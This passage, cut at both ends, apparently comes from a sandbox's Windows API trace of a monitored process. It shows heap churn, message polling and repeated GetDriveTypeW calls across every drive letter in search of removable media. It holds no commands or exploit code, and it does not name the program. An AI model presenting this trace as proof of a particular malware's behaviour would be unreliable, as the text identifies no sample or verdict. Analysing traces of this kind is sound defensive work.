wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.675] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.675] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.675] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.676] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.676] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.676] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.676] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.676] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.676] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.677] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.677] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.677] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.677] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.677] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.678] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.678] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.678] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.678] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.678] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.679] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.679] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.679] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.679] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.680] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.680] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.680] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.680] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.680] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.681] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0216.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0216.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.682] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0216.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0216.682] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0216.682] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0216.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.683] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.683] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0216.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.683] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.683] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0216.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0216.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.684] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.684] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.684] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.684] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.685] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.685] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.685] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.685] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.685] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.686] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.686] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.686] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.686] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.686] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.687] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.687] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.687] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.687] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.687] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.687] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.688] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.688] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.688] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.688] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.688] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.689] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.689] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0216.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.690] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.690] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.690] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.690] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.690] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.690] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0216.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0216.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0216.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0216.691] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0216.691] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.691] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0216.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0216.691] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.692] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.692] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0216.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0216.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.693] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.693] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.693] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.693] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.693] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.693] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.694] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.694] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.694] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.695] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.695] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.695] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.695] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.695] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.696] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.696] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.696] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.696] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.696] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.697] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.697] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.697] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.697] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.697] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.698] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.698] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.698] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0216.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.698] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.698] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0216.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.699] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.699] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.700] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0216.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0216.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0216.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0216.701] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.702] HeapFree (in: 